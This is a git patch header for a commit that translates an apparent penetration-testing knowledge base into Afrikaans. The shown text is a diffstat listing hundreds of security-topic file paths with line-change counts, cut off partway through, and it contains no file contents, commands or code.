From 9f40607d8c19aee75a7c99ffe66f0abf222b2ede Mon Sep 17 00:00:00 2001 From: Translator workflow Date: Sun, 11 Feb 2024 02:07:06 +0000 Subject: [PATCH] Translated to Afrikaans --- .github/pull_request_template.md | 6 +- 1911-pentesting-fox.md | 50 +- 6881-udp-pentesting-bittorrent.md | 32 +- LICENSE.md | 205 +- README.md | 83 +- android-forensics.md | 56 +- backdoors/icmpsh.md | 54 +- backdoors/salseo.md | 162 +- .../README.md | 214 +- burp-suite.md | 46 +- c2/cobalt-strike.md | 238 +- cryptography/certificates.md | 244 +- .../cipher-block-chaining-cbc-mac-priv.md | 76 +- cryptography/crypto-ctfs-tricks.md | 205 +- cryptography/electronic-code-book-ecb.md | 100 +- cryptography/hash-length-extension-attack.md | 72 +- cryptography/padding-oracle-priv.md | 108 +- cryptography/rc4-encrypt-and-decrypt.md | 36 +- emails-vulns.md | 30 +- .../linux-exploiting-basic-esp/README.md | 900 +++--- .../bypassing-canary-and-pie.md | 185 +- .../format-strings-template.md | 125 +- .../linux-exploiting-basic-esp/fusion.md | 76 +- .../linux-exploiting-basic-esp/ret2lib.md | 133 +- .../rop-leaking-libc-address/README.md | 285 +- .../rop-leaking-libc-template.md | 247 +- .../rop-syscall-execv.md | 161 +- exploiting/tools/README.md | 243 +- exploiting/tools/pwntools.md | 187 +- ...windows-exploiting-basic-guide-oscp-lvl.md | 201 +- .../basic-forensic-methodology/README.md | 56 +- .../anti-forensic-techniques.md | 176 +- .../docker-forensics.md | 100 +- .../file-integrity-monitoring.md | 50 +- .../linux-forensics.md | 405 ++- .../malware-analysis.md | 264 +- .../memory-dump-analysis/README.md | 50 +- .../partitions-file-systems-carving/README.md | 275 +- .../file-data-carving-recovery-tools.md | 102 +- .../file-data-carving-tools.md | 76 +- .../pcap-inspection/README.md | 205 +- .../pcap-inspection/dnscat-exfiltration.md | 60 +- .../usb-keyboard-pcap-analysis.md | 40 +- .../pcap-inspection/usb-keystrokes.md | 42 +- .../pcap-inspection/wifi-pcap-analysis.md | 58 +- .../pcap-inspection/wireshark-tricks.md | 146 +- .../.pyc.md | 176 +- .../README.md | 34 +- .../browser-artifacts.md | 219 +- .../desofuscation-vbs-cscript.exe.md | 92 +- .../local-cloud-storage.md | 142 +- .../office-file-analysis.md | 53 +- .../pdf-file-analysis.md | 54 +- .../png-tricks.md | 38 +- .../video-and-audio-file-analysis.md | 44 +- .../zips-tricks.md | 48 +- .../windows-forensics/README.md | 528 ++-- .../interesting-windows-registry-keys.md | 129 +- .../windows-forensics/windows-processes.md | 126 +- .../image-acquisition-and-mount.md | 94 +- .../volatility-cheatsheet.md | 2591 +++++++++++++++-- .../suricata-and-iptables-cheatsheet.md | 453 ++- .../brute-force.md | 1238 ++++++-- .../exfiltration.md | 611 +++- .../external-recon-methodology/README.md | 552 ++-- .../github-leaked-secrets.md | 38 +- .../wide-source-code-search.md | 46 +- .../pentesting-methodology.md | 165 +- .../pentesting-network/README.md | 752 ++--- .../pentesting-network/dhcpv6.md | 72 +- .../pentesting-network/eigrp-attacks.md | 118 +- .../glbp-and-hsrp-attacks.md | 196 +- .../pentesting-network/ids-evasion.md | 76 +- .../lateral-vlan-segmentation-bypass.md | 62 +- .../network-protocols-explained-esp.md | 78 +- .../pentesting-network/nmap-summary-esp.md | 274 +- .../pentesting-network/pentesting-ipv6.md | 153 +- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 141 +- .../spoofing-ssdp-and-upnp-devices.md | 56 +- .../pentesting-wifi/README.md | 821 +++--- .../pentesting-wifi/evil-twin-eap-tls.md | 84 +- .../phishing-methodology/README.md | 424 ++- .../phishing-methodology/clone-a-website.md | 83 +- .../phishing-methodology/detecting-phising.md | 95 +- .../phishing-documents.md | 188 +- .../python/README.md | 50 +- .../python/basic-python.md | 314 +- .../python/bruteforce-hash-few-chars.md | 87 +- .../python/bypass-python-sandboxes/README.md | 1743 ++++++++--- .../load_name-load_const-opcode-oob-read.md | 264 +- ...s-pollution-pythons-prototype-pollution.md | 272 +- .../python/pyscript.md | 98 +- .../python/python-internal-read-gadgets.md | 58 +- .../python/venv.md | 39 +- .../python/web-requests.md | 123 +- .../search-exploits.md | 58 +- .../shells/README.md | 36 +- .../shells/full-ttys.md | 62 +- .../shells/linux.md | 618 +++- .../shells/msfvenom.md | 193 +- .../shells/windows.md | 729 +++-- .../threat-modeling.md | 100 +- .../tunneling-and-port-forwarding.md | 467 +-- interesting-http.md | 56 +- .../README.md | 114 +- .../ddexec.md | 106 +- linux-hardening/freeipa-pentesting.md | 158 +- .../linux-environment-variables.md | 124 +- .../linux-post-exploitation/README.md | 74 +- .../pam-pluggable-authentication-modules.md | 76 +- .../linux-privilege-escalation-checklist.md | 235 +- .../privilege-escalation/README.md | 1434 ++++----- .../privilege-escalation/cisco-vmanage.md | 105 +- .../containerd-ctr-privilege-escalation.md | 62 +- ...-command-injection-privilege-escalation.md | 532 ++-- .../docker-security/README.md | 1184 ++++++-- ...-docker-socket-for-privilege-escalation.md | 80 +- .../docker-security/apparmor.md | 258 +- ...uthn-docker-access-authorization-plugin.md | 164 +- .../docker-security/cgroups.md | 99 +- .../README.md | 695 +++-- .../docker-release_agent-cgroups-escape.md | 77 +- ...se_agent-exploit-relative-paths-to-pids.md | 90 +- .../sensitive-mounts.md | 197 +- .../docker-security/docker-privileged.md | 108 +- .../docker-security/namespaces/README.md | 44 +- .../namespaces/cgroup-namespace.md | 130 +- .../namespaces/ipc-namespace.md | 111 +- .../namespaces/mount-namespace.md | 108 +- .../namespaces/network-namespace.md | 109 +- .../namespaces/pid-namespace.md | 104 +- .../namespaces/time-namespace.md | 98 +- .../namespaces/user-namespace.md | 143 +- .../namespaces/uts-namespace.md | 107 +- .../docker-security/seccomp.md | 210 +- .../docker-security/weaponizing-distroless.md | 56 +- .../electron-cef-chromium-debugger-abuse.md | 134 +- .../escaping-from-limited-bash.md | 220 +- .../privilege-escalation/euid-ruid-suid.md | 238 +- .../interesting-groups-linux-pe/README.md | 156 +- .../lxd-privilege-escalation.md | 72 +- .../ld.so.conf-example.md | 192 +- .../linux-active-directory.md | 100 +- .../linux-capabilities.md | 1499 +++++----- .../privilege-escalation/logstash.md | 88 +- .../nfs-no_root_squash-misconfiguration-pe.md | 172 +- .../payloads-to-execute.md | 330 ++- .../runc-privilege-escalation.md | 56 +- .../privilege-escalation/selinux.md | 47 +- .../socket-command-injection.md | 66 +- .../splunk-lpe-and-persistence.md | 79 +- .../ssh-forward-agent-exploitation.md | 56 +- .../wildcards-spare-tricks.md | 79 +- .../privilege-escalation/write-to-root.md | 52 +- .../useful-linux-commands/README.md | 395 ++- .../bypass-bash-restrictions.md | 372 ++- .../privilege-escalation/exploiting-yum.md | 62 +- .../interesting-groups-linux-pe.md | 142 +- macos-hardening/macos-auto-start-locations.md | 1426 +++++---- macos-hardening/macos-red-teaming/README.md | 168 +- .../macos-red-teaming/macos-keychain.md | 166 +- .../macos-red-teaming/macos-mdm/README.md | 285 +- ...nrolling-devices-in-other-organisations.md | 88 +- .../macos-mdm/macos-serial-number.md | 84 +- .../README.md | 117 +- .../mac-os-architecture/README.md | 122 +- .../macos-function-hooking.md | 418 +-- .../mac-os-architecture/macos-iokit.md | 246 +- .../README.md | 1070 +++---- .../macos-kernel-extensions.md | 68 +- .../macos-kernel-vulnerabilities.md | 28 +- .../macos-system-extensions.md | 108 +- .../macos-applefs.md | 58 +- .../README.md | 379 +-- .../arm64-basic-assembly.md | 879 +++--- .../introduction-to-x64.md | 581 ++-- .../macos-basic-objective-c.md | 230 +- .../macos-bypassing-firewalls.md | 106 +- .../macos-defensive-apps.md | 58 +- ...yld-hijacking-and-dyld_insert_libraries.md | 118 +- .../macos-file-extension-apps.md | 98 +- .../README.md | 222 +- .../macos-bundles.md | 82 +- .../macos-installers-abuse.md | 94 +- .../macos-memory-dumping.md | 64 +- .../macos-sensitive-locations.md | 146 +- .../universal-binaries-and-mach-o-format.md | 324 +-- .../macos-gcd-grand-central-dispatch.md | 166 +- .../macos-privilege-escalation.md | 181 +- .../macos-proces-abuse/README.md | 108 +- .../macos-.net-applications-injection.md | 116 +- .../macos-proces-abuse/macos-dirty-nib.md | 114 +- .../macos-electron-applications-injection.md | 248 +- .../macos-mig-mach-interface-generator.md | 515 ++-- .../macos-thread-injection-via-task-port.md | 195 +- .../macos-xpc/README.md | 354 ++- .../macos-xpc/macos-xpc-authorization.md | 564 ++-- .../README.md | 92 +- .../macos-pid-reuse.md | 317 +- ...s-xpc_connection_get_audit_token-attack.md | 162 +- .../macos-java-apps-injection.md | 170 +- .../macos-library-injection/README.md | 358 +-- .../macos-perl-applications-injection.md | 64 +- .../macos-ruby-applications-injection.md | 44 +- .../macos-protocols.md | 133 +- .../macos-security-protections/README.md | 126 +- .../macos-dangerous-entitlements.md | 132 +- .../macos-fs-tricks/README.md | 252 +- .../macos-xattr-acls-extra-stuff.md | 206 +- .../macos-gatekeeper.md | 269 +- .../macos-launch-environment-constraints.md | 160 +- .../macos-sandbox/README.md | 219 +- .../macos-default-sandbox-debug.md | 114 +- .../macos-sandbox-debug-and-bypass/README.md | 224 +- .../macos-office-sandbox-bypasses.md | 79 +- .../macos-security-protections/macos-sip.md | 234 +- .../macos-tcc/README.md | 552 ++-- .../macos-tcc/macos-tcc-bypasses/README.md | 461 ++- .../macos-tcc-bypasses/macos-apple-scripts.md | 54 +- .../macos-tcc/macos-tcc-payloads.md | 856 +++--- .../macos-users.md | 54 +- macos-hardening/macos-useful-commands.md | 223 +- misc/references.md | 32 +- .../android-app-pentesting/README.md | 773 +++-- .../android-app-pentesting/adb-commands.md | 244 +- .../android-applications-basics.md | 448 ++- .../android-task-hijacking.md | 78 +- .../android-app-pentesting/apk-decompilers.md | 70 +- .../avd-android-virtual-device.md | 218 +- ...bypass-biometric-authentication-android.md | 89 +- .../content-protocol.md | 115 +- .../drozer-tutorial/README.md | 311 +- .../exploiting-content-providers.md | 243 +- .../exploiting-a-debuggeable-applciation.md | 134 +- .../frida-tutorial/README.md | 430 ++- .../frida-tutorial/frida-tutorial-1.md | 168 +- .../frida-tutorial/frida-tutorial-2.md | 254 +- .../frida-tutorial/objection-tutorial.md | 253 +- .../frida-tutorial/owaspuncrackable-1.md | 192 +- .../google-ctf-2018-shall-we-play-a-game.md | 102 +- .../install-burp-certificate.md | 111 +- .../intent-injection.md | 34 +- .../make-apk-accept-ca-certificate.md | 80 +- .../manual-deobfuscation.md | 76 +- .../react-native-application.md | 66 +- .../reversing-native-libraries.md | 94 +- .../android-app-pentesting/smali-changes.md | 198 +- .../spoofing-your-location-in-play-store.md | 74 +- .../android-app-pentesting/tapjacking.md | 73 +- .../android-app-pentesting/webview-attacks.md | 141 +- mobile-pentesting/android-checklist.md | 120 +- mobile-pentesting/cordova-apps.md | 320 +- mobile-pentesting/ios-pentesting-checklist.md | 158 +- mobile-pentesting/ios-pentesting/README.md | 1120 ++++--- .../basic-ios-testing-operations.md | 168 +- .../burp-configuration-for-ios.md | 125 +- ...-entitlements-from-compiled-application.md | 60 +- .../frida-configuration-in-ios.md | 374 +-- .../ios-pentesting/ios-app-extensions.md | 82 +- .../ios-pentesting/ios-basics.md | 164 +- ...m-uri-handlers-deeplinks-custom-schemes.md | 89 +- .../ios-hooking-with-objection.md | 441 ++- .../ios-pentesting/ios-protocol-handlers.md | 34 +- .../ios-serialisation-and-encoding.md | 100 +- .../ios-pentesting/ios-testing-environment.md | 144 +- .../ios-pentesting/ios-uiactivity-sharing.md | 86 +- .../ios-pentesting/ios-uipasteboard.md | 104 +- .../ios-pentesting/ios-universal-links.md | 126 +- .../ios-pentesting/ios-webviews.md | 322 +- mobile-pentesting/xamarin-apps.md | 76 +- ...0-network-data-management-protocol-ndmp.md | 72 +- .../1026-pentesting-rusersd.md | 41 +- .../1080-pentesting-socks.md | 156 +- .../1099-pentesting-java-rmi.md | 159 +- .../11211-memcache/README.md | 232 +- .../11211-memcache/memcache-commands.md | 204 +- .../113-pentesting-ident.md | 90 +- .../135-pentesting-msrpc.md | 127 +- .../137-138-139-pentesting-netbios.md | 94 +- .../1414-pentesting-ibmmq.md | 254 +- .../README.md | 90 +- .../15672-pentesting-rabbitmq-management.md | 58 +- .../1723-pentesting-pptp.md | 40 +- .../1883-pentesting-mqtt-mosquitto.md | 138 +- .../2375-pentesting-docker.md | 263 +- ...-24008-24009-49152-pentesting-glusterfs.md | 56 +- .../27017-27018-mongodb.md | 320 +- .../3128-pentesting-squid.md | 64 +- .../3260-pentesting-iscsi.md | 126 +- .../3299-pentesting-saprouter.md | 86 +- .../3632-pentesting-distcc.md | 52 +- .../3690-pentesting-subversion-svn-server.md | 95 +- .../3702-udp-pentesting-ws-discovery.md | 43 +- .../43-pentesting-whois.md | 71 +- ...ntesting-erlang-port-mapper-daemon-epmd.md | 84 +- .../44134-pentesting-tiller-helm.md | 70 +- .../44818-ethernetip.md | 76 +- .../47808-udp-bacnet.md | 58 +- .../4786-cisco-smart-install.md | 56 +- .../4840-pentesting-opc-ua.md | 50 +- .../49-pentesting-tacacs+.md | 60 +- .../5000-pentesting-docker-registry.md | 266 +- ...060-50070-50075-50090-pentesting-hadoop.md | 40 +- .../512-pentesting-rexec.md | 36 +- .../515-pentesting-line-printer-daemon-lpd.md | 46 +- .../5353-udp-multicast-dns-mdns.md | 78 +- .../5439-pentesting-redshift.md | 30 +- .../554-8554-pentesting-rtsp.md | 90 +- .../5555-android-debug-bridge.md | 54 +- .../5601-pentesting-kibana.md | 56 +- .../5671-5672-pentesting-amqp.md | 95 +- .../584-pentesting-afp.md | 52 +- .../5984-pentesting-couchdb.md | 213 +- .../5985-5986-pentesting-omi.md | 58 +- .../5985-5986-pentesting-winrm.md | 346 +-- .../6000-pentesting-x11.md | 183 +- network-services-pentesting/623-udp-ipmi.md | 123 +- .../6379-pentesting-redis.md | 318 +- network-services-pentesting/69-udp-tftp.md | 54 +- .../7-tcp-udp-pentesting-echo.md | 54 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 214 +- .../8086-pentesting-influxdb.md | 94 +- network-services-pentesting/8089-splunkd.md | 108 +- ...33-18333-38333-18444-pentesting-bitcoin.md | 48 +- .../873-pentesting-rsync.md | 138 +- .../9000-pentesting-fastcgi.md | 56 +- .../9001-pentesting-hsqldb.md | 96 +- network-services-pentesting/9100-pjl.md | 62 +- .../9200-pentesting-elasticsearch.md | 231 +- network-services-pentesting/cassandra.md | 82 +- .../ipsec-ike-vpn-pentesting.md | 246 +- .../nfs-service-pentesting.md | 140 +- .../pentesting-264-check-point-firewall-1.md | 56 +- ...ting-631-internet-printing-protocol-ipp.md | 44 +- .../pentesting-compaq-hp-insight-manager.md | 44 +- network-services-pentesting/pentesting-dns.md | 408 ++- .../pentesting-finger.md | 72 +- .../pentesting-ftp/README.md | 307 +- .../pentesting-ftp/ftp-bounce-attack.md | 57 +- .../ftp-bounce-download-2oftp-file.md | 64 +- .../pentesting-imap.md | 199 +- network-services-pentesting/pentesting-irc.md | 79 +- ...entesting-jdwp-java-debug-wire-protocol.md | 78 +- .../pentesting-kerberos-88/README.md | 82 +- .../harvesting-tickets-from-linux.md | 50 +- .../harvesting-tickets-from-windows.md | 44 +- .../pentesting-ldap.md | 286 +- .../pentesting-modbus.md | 81 +- .../README.md | 456 +-- .../types-of-mssql-users.md | 62 +- .../pentesting-mysql.md | 345 ++- network-services-pentesting/pentesting-ntp.md | 145 +- network-services-pentesting/pentesting-pop.md | 238 +- .../pentesting-postgresql.md | 738 +++-- network-services-pentesting/pentesting-rdp.md | 169 +- .../pentesting-remote-gdbserver.md | 226 +- .../pentesting-rlogin.md | 60 +- .../pentesting-rpcbind.md | 156 +- network-services-pentesting/pentesting-rsh.md | 42 +- network-services-pentesting/pentesting-sap.md | 360 ++- network-services-pentesting/pentesting-smb.md | 490 ++-- .../pentesting-smb/rpcclient-enumeration.md | 134 +- .../pentesting-smtp/README.md | 518 ++-- .../pentesting-smtp/smtp-commands.md | 62 +- .../pentesting-snmp/README.md | 283 +- .../pentesting-snmp/cisco-snmp.md | 50 +- .../pentesting-snmp/snmp-rce.md | 67 +- network-services-pentesting/pentesting-ssh.md | 359 ++- .../pentesting-telnet.md | 306 +- network-services-pentesting/pentesting-vnc.md | 108 +- .../pentesting-voip/README.md | 414 ++- .../basic-voip-protocols/README.md | 125 +- .../sip-session-initiation-protocol.md | 219 +- .../pentesting-web/403-and-401-bypasses.md | 185 +- .../pentesting-web/README.md | 437 ++- .../aem-adobe-experience-cloud.md | 34 +- .../pentesting-web/angular.md | 814 +++--- .../pentesting-web/apache.md | 78 +- .../artifactory-hacking-guide.md | 34 +- .../pentesting-web/bolt-cms.md | 48 +- .../pentesting-web/buckets/README.md | 32 +- .../buckets/firebase-database.md | 32 +- .../pentesting-web/cgi.md | 124 +- .../pentesting-web/code-review-tools.md | 263 +- .../pentesting-web/dotnetnuke-dnn.md | 52 +- .../pentesting-web/drupal.md | 186 +- .../electron-desktop-apps/README.md | 270 +- ...solation-rce-via-electron-internal-code.md | 66 +- .../electron-contextisolation-rce-via-ipc.md | 137 +- ...n-contextisolation-rce-via-preload-code.md | 100 +- .../pentesting-web/flask.md | 127 +- .../pentesting-web/git.md | 46 +- .../pentesting-web/golang.md | 48 +- .../pentesting-web/grafana.md | 40 +- .../pentesting-web/graphql.md | 574 ++-- .../pentesting-web/gwt-google-web-toolkit.md | 47 + .../pentesting-web/h2-java-sql-database.md | 58 +- .../iis-internet-information-services.md | 214 +- .../pentesting-web/imagemagick-security.md | 74 +- .../pentesting-web/jboss.md | 50 +- .../pentesting-web/jira.md | 45 +- .../pentesting-web/joomla.md | 185 +- .../pentesting-web/jsp.md | 42 +- .../pentesting-web/laravel.md | 112 +- .../pentesting-web/moodle.md | 150 +- .../pentesting-web/nginx.md | 239 +- .../pentesting-web/nodejs-express.md | 80 +- .../pentesting-web/php-tricks-esp/README.md | 376 +-- ...object-creation-new-usd_get-a-usd_get-b.md | 108 +- .../pentesting-web/php-tricks-esp/php-ssrf.md | 62 +- .../README.md | 1074 ++++--- .../disable_functions-bypass-dl-function.md | 126 +- ...than-3.3.0-php-greater-than-5.4-exploit.md | 46 +- .../disable_functions-bypass-mod_cgi.md | 80 +- ...p-4-greater-than-4.2.0-php-5-pcntl_exec.md | 50 +- ..._functions-bypass-php-5.2-fopen-exploit.md | 38 +- ...p-5.2.3-win32std-ext-protections-bypass.md | 38 +- ...ons-bypass-php-5.2.4-and-5.2.5-php-curl.md | 50 +- ...e_functions-bypass-php-7.0-7.4-nix-only.md | 366 ++- ...isable_functions-bypass-php-fpm-fastcgi.md | 819 +++--- ...s-bypass-php-less-than-5.2.9-on-windows.md | 108 +- ...perl-extension-safe_mode-bypass-exploit.md | 46 +- ...roc_open-and-custom-environment-exploit.md | 44 +- .../disable_functions-bypass-via-mem.md | 178 +- ...ons-php-5.2.4-ioncube-extension-exploit.md | 52 +- ...le_functions-php-5.x-shellshock-exploit.md | 68 +- .../pentesting-web/put-method-webdav.md | 126 +- .../pentesting-web/python.md | 36 +- .../pentesting-web/rocket-chat.md | 48 +- .../pentesting-web/special-http-headers.md | 171 +- .../pentesting-web/spring-actuators.md | 104 +- .../pentesting-web/symphony.md | 30 +- .../pentesting-web/tomcat.md | 253 +- .../tomcat/basic-tomcat-info.md | 150 +- .../pentesting-web/uncovering-cloudflare.md | 138 +- .../pentesting-web/vmware-esx-vcenter....md | 56 +- .../pentesting-web/waf-bypass.md | 78 +- .../pentesting-web/web-api-pentesting.md | 91 +- .../pentesting-web/werkzeug.md | 190 +- .../pentesting-web/wordpress.md | 380 ++- online-platforms-with-api.md | 106 +- other-web-tricks.md | 56 +- pentesting-dns.md | 36 +- pentesting-web/2fa-bypass.md | 144 +- pentesting-web/abusing-hop-by-hop-headers.md | 66 +- pentesting-web/account-takeover.md | 106 +- .../README.md | 690 ++--- .../browext-clickjacking.md | 114 +- ...rowext-permissions-and-host_permissions.md | 123 +- .../browext-xss-example.md | 142 +- pentesting-web/bypass-payment-process.md | 78 +- pentesting-web/cache-deception.md | 206 +- pentesting-web/captcha-bypass.md | 80 +- pentesting-web/clickjacking.md | 316 +- pentesting-web/client-side-path-traversal.md | 38 +- .../client-side-template-injection-csti.md | 74 +- pentesting-web/command-injection.md | 84 +- .../README.md | 799 ++--- ...ypass-self-+-unsafe-inline-with-iframes.md | 59 +- pentesting-web/cors-bypass.md | 371 ++- pentesting-web/crlf-0d-0a.md | 200 +- .../csrf-cross-site-request-forgery.md | 791 +++-- .../README.md | 252 +- .../ss-leaks.md | 32 +- pentesting-web/dependency-confusion.md | 66 +- pentesting-web/deserialization/README.md | 692 ++--- ...er-gadgets-expandedwrapper-and-json.net.md | 258 +- ...ialization-objectinputstream-readobject.md | 174 +- ...ploiting-__viewstate-knowing-the-secret.md | 34 +- .../exploiting-__viewstate-parameter.md | 187 +- ...ava-dns-deserialization-and-gadgetprobe.md | 254 +- ...va-jsf-viewstate-.faces-deserialization.md | 34 +- ...ava-transformers-to-rutime-exec-payload.md | 288 +- ...g-and-directory-interface-and-log4shell.md | 378 ++- .../README.md | 316 +- .../client-side-prototype-pollution.md | 124 +- .../express-prototype-pollution-gadgets.md | 116 +- .../prototype-pollution-to-rce.md | 250 +- .../php-deserialization-+-autoload-classes.md | 104 +- .../python-yaml-deserialization.md | 96 +- pentesting-web/domain-subdomain-takeover.md | 104 +- pentesting-web/email-injections.md | 165 +- pentesting-web/file-inclusion/README.md | 557 ++-- ..._stream_prefer_studio-+-path-disclosure.md | 70 +- .../lfi2rce-via-eternal-waiting.md | 126 +- .../lfi2rce-via-nginx-temp-files.md | 319 +- .../file-inclusion/lfi2rce-via-php-filters.md | 371 ++- .../file-inclusion/lfi2rce-via-phpinfo.md | 69 +- .../lfi2rce-via-segmentation-fault.md | 76 +- .../lfi2rce-via-temp-file-uploads.md | 62 +- .../file-inclusion/phar-deserialization.md | 86 +- .../via-php_session_upload_progress.md | 52 +- pentesting-web/file-upload/README.md | 368 ++- .../pdf-upload-xxe-and-cors-bypass.md | 28 +- ...ula-csv-doc-latex-ghostscript-injection.md | 201 +- pentesting-web/grpc-web-pentest.md | 320 +- pentesting-web/h2c-smuggling.md | 105 +- pentesting-web/hacking-jwt-json-web-tokens.md | 235 +- pentesting-web/hacking-with-cookies/README.md | 271 +- .../hacking-with-cookies/cookie-bomb.md | 56 +- .../cookie-jar-overflow.md | 46 +- .../hacking-with-cookies/cookie-tossing.md | 80 +- .../http-connection-contamination.md | 44 +- .../http-connection-request-smuggling.md | 48 +- .../http-request-smuggling/README.md | 631 ++-- .../browser-http-request-smuggling.md | 34 +- .../request-smuggling-in-http-2-downgrades.md | 32 +- .../http-response-smuggling-desync.md | 131 +- pentesting-web/idor.md | 34 +- pentesting-web/integer-overflow.md | 64 +- pentesting-web/ldap-injection.md | 191 +- pentesting-web/login-bypass/README.md | 104 +- .../login-bypass/sql-login-bypass.md | 50 +- pentesting-web/nosql-injection.md | 379 ++- pentesting-web/oauth-to-account-takeover.md | 224 +- pentesting-web/open-redirect.md | 156 +- pentesting-web/parameter-pollution.md | 86 +- pentesting-web/phone-number-injections.md | 36 +- .../pocs-and-polygloths-cheatsheet/README.md | 361 ++- .../web-vulns-list.md | 28 +- .../postmessage-vulnerabilities/README.md | 230 +- ...blocking-main-page-to-steal-postmessage.md | 54 +- .../bypassing-sop-with-iframes-1.md | 124 +- .../bypassing-sop-with-iframes-2.md | 116 +- ...l-postmessage-modifying-iframe-location.md | 58 +- .../proxy-waf-protections-bypass.md | 32 +- pentesting-web/race-condition.md | 330 +-- pentesting-web/rate-limit-bypass.md | 77 +- .../registration-vulnerabilities.md | 203 +- ...ular-expression-denial-of-service-redos.md | 86 +- pentesting-web/reset-password.md | 212 +- pentesting-web/reverse-tab-nabbing.md | 102 +- pentesting-web/saml-attacks/README.md | 300 +- pentesting-web/saml-attacks/saml-basics.md | 250 +- ...inclusion-edge-side-inclusion-injection.md | 221 +- pentesting-web/sql-injection/README.md | 464 +-- .../sql-injection/cypher-injection-neo4j.md | 28 +- .../sql-injection/ms-access-sql-injection.md | 182 +- .../sql-injection/mssql-injection.md | 351 ++- .../sql-injection/mysql-injection/README.md | 178 +- .../mysql-injection/mysql-ssrf.md | 54 +- .../sql-injection/oracle-injection.md | 150 +- .../postgresql-injection/README.md | 86 +- .../big-binary-files-upload-postgresql.md | 86 +- .../dblink-lo_import-data-exfiltration.md | 34 +- ...and-ntlm-chanllenge-response-disclosure.md | 115 +- .../pl-pgsql-password-bruteforce.md | 166 +- .../rce-with-postgresql-extensions.md | 324 +-- .../rce-with-postgresql-languages.md | 300 +- pentesting-web/sql-injection/sqlmap.md | 314 +- pentesting-web/sql-injection/sqlmap/README.md | 542 +++- .../sqlmap/second-order-injection-sqlmap.md | 91 +- .../README.md | 269 +- .../cloud-ssrf.md | 305 +- .../ssrf-vulnerable-platforms.md | 32 +- .../url-format-bypass.md | 98 +- .../README.md | 742 ++--- .../el-expression-language.md | 202 +- .../jinja2-ssti.md | 157 +- pentesting-web/unicode-injection/README.md | 66 +- .../unicode-normalization.md | 94 +- pentesting-web/web-tool-wfuzz.md | 408 ++- .../web-vulnerabilities-methodology/README.md | 181 +- pentesting-web/websocket-attacks.md | 168 +- pentesting-web/xpath-injection.md | 348 ++- pentesting-web/xs-search.md | 1152 ++++---- .../connection-pool-by-destination-example.md | 210 +- .../xs-search/connection-pool-example.md | 754 +++-- .../cookie-bomb-+-onerror-xs-leak.md | 122 +- .../xs-search/css-injection/README.md | 484 ++- .../css-injection/css-injection-code.md | 193 +- .../event-loop-blocking-+-lazy-images.md | 254 +- .../xs-search/javascript-execution-xs-leak.md | 124 +- .../performance.now-+-force-heavy-task.md | 184 +- .../xs-search/performance.now-example.md | 88 +- .../xs-search/url-max-length-client-side.md | 102 +- ...ble-stylesheet-language-transformations.md | 378 +-- .../xss-cross-site-scripting/README.md | 1167 ++++---- .../abusing-service-workers.md | 112 +- .../chrome-cache-to-xss.md | 54 +- .../debugging-client-side-js.md | 50 +- .../dom-clobbering.md | 135 +- .../xss-cross-site-scripting/dom-invader.md | 106 +- .../xss-cross-site-scripting/dom-xss.md | 200 +- .../iframes-in-xss-and-csp.md | 156 +- .../xss-cross-site-scripting/js-hoisting.md | 128 +- .../other-js-tricks.md | 494 ++-- .../xss-cross-site-scripting/pdf-injection.md | 36 +- .../server-side-xss-dynamic-pdf.md | 168 +- .../xss-cross-site-scripting/shadow-dom.md | 32 +- .../xss-cross-site-scripting/sniff-leak.md | 38 +- .../some-same-origin-method-execution.md | 68 +- .../xss-cross-site-scripting/steal-info-js.md | 113 +- .../xss-in-markdown.md | 112 +- .../xssi-cross-site-script-inclusion.md | 102 +- pentesting-web/xxe-xee-xml-external-entity.md | 659 +++-- .../escaping-from-gui-applications/README.md | 384 ++- physical-attacks/firmware-analysis/README.md | 258 +- .../firmware-analysis/bootloader-testing.md | 94 +- .../firmware-analysis/firmware-integrity.md | 80 +- physical-attacks/physical-attacks.md | 80 +- post-exploitation.md | 50 +- radio-hacking/README.md | 32 +- radio-hacking/low-power-wide-area-network.md | 40 +- .../pentesting-ble-bluetooth-low-energy.md | 93 +- radio-hacking/pentesting-rfid.md | 112 +- .../linux-exploiting-basic-esp/elf-tricks.md | 448 ++- reversing/common-api-used-in-malware.md | 168 +- reversing/cryptographic-algorithms/README.md | 178 +- .../unpacking-binaries.md | 66 +- .../reversing-tools-basic-methods/README.md | 415 +-- .../angr/README.md | 238 +- .../angr/angr-examples.md | 1204 ++++---- .../blobrunner.md | 294 +- .../cheat-engine.md | 143 +- .../satisfiability-modulo-theories-smt-z3.md | 144 +- reversing/reversing-tools/README.md | 139 +- reversing/reversing-tools/blobrunner.md | 294 +- reversing/word-macros.md | 42 +- ...itive-information-disclosure-from-a-web.md | 42 +- stego/esoteric-languages.md | 71 +- stego/stego-tricks.md | 176 +- todo/cookies-policy.md | 44 +- todo/hardware-hacking/README.md | 82 +- todo/hardware-hacking/i2c.md | 85 +- todo/hardware-hacking/jtag.md | 46 +- todo/hardware-hacking/radio.md | 175 +- todo/hardware-hacking/spi.md | 41 +- todo/hardware-hacking/uart.md | 119 +- todo/misc.md | 74 +- todo/more-tools.md | 134 +- .../radio-hacking/fissure-the-rf-framework.md | 201 +- todo/radio-hacking/flipper-zero/README.md | 48 +- .../flipper-zero/fz-125khz-rfid.md | 62 +- todo/radio-hacking/flipper-zero/fz-ibutton.md | 54 +- .../radio-hacking/flipper-zero/fz-infrared.md | 56 +- todo/radio-hacking/flipper-zero/fz-nfc.md | 91 +- todo/radio-hacking/flipper-zero/fz-sub-ghz.md | 133 +- todo/radio-hacking/ibutton.md | 56 +- todo/radio-hacking/infrared.md | 93 +- todo/radio-hacking/proxmark-3.md | 72 +- todo/radio-hacking/sub-ghz-rf.md | 99 +- todo/rust-basics.md | 538 ++-- todo/tr-069.md | 11 + welcome/about-the-author.md | 34 +- welcome/hacktricks-values-and-faq.md | 164 +- .../active-directory-methodology/README.md | 606 ++-- .../abusing-ad-mssql.md | 174 +- .../acl-persistence-abuse/README.md | 195 +- .../shadow-credentials.md | 82 +- .../ad-certificates.md | 156 +- .../ad-certificates/account-persistence.md | 70 +- .../ad-certificates/certificate-theft.md | 110 +- .../ad-certificates/domain-escalation.md | 484 ++- .../ad-certificates/domain-persistence.md | 85 +- .../ad-dns-records.md | 34 +- .../ad-information-in-printers.md | 86 +- .../asreproast.md | 108 +- .../bloodhound.md | 96 +- .../constrained-delegation.md | 62 +- .../custom-ssp.md | 66 +- .../active-directory-methodology/dcshadow.md | 112 +- .../active-directory-methodology/dcsync.md | 109 +- .../diamond-ticket.md | 51 +- .../dsrm-credentials.md | 54 +- 